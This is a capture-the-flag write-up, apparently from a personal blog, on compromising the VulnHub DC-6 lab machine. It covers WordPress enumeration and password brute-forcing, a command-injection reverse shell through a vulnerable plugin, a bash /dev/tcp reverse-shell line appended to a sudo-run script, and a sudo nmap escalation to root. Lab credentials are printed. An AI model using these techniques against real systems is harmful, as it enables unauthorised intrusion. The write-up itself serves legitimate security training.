DC-6 starts off by enumerating usernames from a WordPress website. I’m able to gain a set of credentials to log into the admin panel with a brute-force attack. There is a WP Plugin which can be leveraged to gain a foothold on the system. A to-do note containing the user’s credentials is discovered while enumerating the home directory. For the root part, there is a sudo privileges on a writable backup script and nmap which allows me to escalate to other users then straight to root.
Reconnaissance
Host Discovery — arpscan
Because 192.168.2.1 and 192.168.2.2 are virtual gateway addresses, the target machine’s IP address is most likely 192.168.2.104.
arp-scan --interface eth0 '192.168.2.0/24' | tee scans/00-arp-scan-dc6
Nmap
With initial scan, nmap shows two ports open: SSH on port 22 and Apache Web Server on port 80.
nmap -n -sC -sV -oA scans/10-initial-dc6 '192.168.2.104' -v
From the results above, there’s a redirection to http://wordy/ on port 80. To properly resolve the web, I’ll add wordy to my /etc/hosts file.
echo '192.168.1.104 wordy' >> /etc/hostsTCP 80 — Website
This page clearly states that it’s a WordPress site.
Nothing interesting to explore here, but the text secure plugins seems to be a hint from the machine’s author.
— :: Nmap NSE
Runningnmap script against this website finds several usernames.
nmap -p 80 --script "http-wordpress*" wordy
I’ll save those usernames into a file called users.
— :: WPScan
wpscan identifies two vulnerable WP plugins: an RCE and a user role privilege escalation.
wpscan --url http://wordy/ --enumerate vp --plugins-detection aggressive --api-token your_token123
I’m interested with the RCE one, but before that I’ll have to find creds.
Brute-forcing passwords
At that time, I was stuck for a couple of hours. Asking for a nudge and the answer was to brute force, I didn’t know that the box’s author actually gave us a hint to create a custom wordlist from rokyou.txt.
I’ll create new wordlist from rockyou.txt and then use it to perform a brute force attack using wpscan.
wpscan --url http://wordy/ --usernames users --passwords passwords.txt
It returns one valid credentials: mark:helpdesk10.
Foothold
Plainview Activity Monitor — RCE (CVE-2018–15877)
With the credentials I obtained, I can login into WP Dashboard.
From the previous wpscan, I searched the exploit PoC for Plainview Activity Monitor RCE and found this from exploit-db.
The exploit PoC exploits a vulnerability that comes from this IP tools feature.
I’ll hit the lookup button and intercept the request on Burp.
RCE can be achieved by adding a set of malicious OS commands after the command pipe |, semi colon ; (stacked command), or logical OR || at the ip section. In this case, I send a reverse shell.
Privilege Escalation
Internal enumeration
The home directory is readable by www-data and there are two interesting files: backups.sh and things-to-do.txt.
I immediately checked the contents of backups.sh and things-to-do.txt.
The backups.sh script is writable by group devs, and I’ll note that.
And this things-to-do.txt contains graham’s credentials.
SSH — Graham
I tried the graham’s creds, graham:GSo7isUM1D4, on SSH, and it worked.
Shell as jens via sudo backups.sh
User graham has sudo privileges on the backups.sh script, and this allows me to run the script as user jens.
Because the script is also writable by graham (devs group), I can exploit this to escalate myself to jens by adding a reverse shell line to the script and then run it with sudo.
graham@dc-6:~$ echo 'bash -i >& /dev/tcp/192.168.2.108/9000 0>&1' >> /home/jens/backups.sh
Shell as root via sudo nmap
I found out that user jens is allowed to execute nmap as root user.
I can also exploit this using reference from GTFObins.
jens@dc-6:/home/graham$ TF=$(mktemp)
jens@dc-6:/home/graham$ echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:/home/graham$ sudo nmap --script=$TF
And here is the flag:
Originally published at: https://fahmifj.github.io/writeups/vulnhub/vh-dc6/
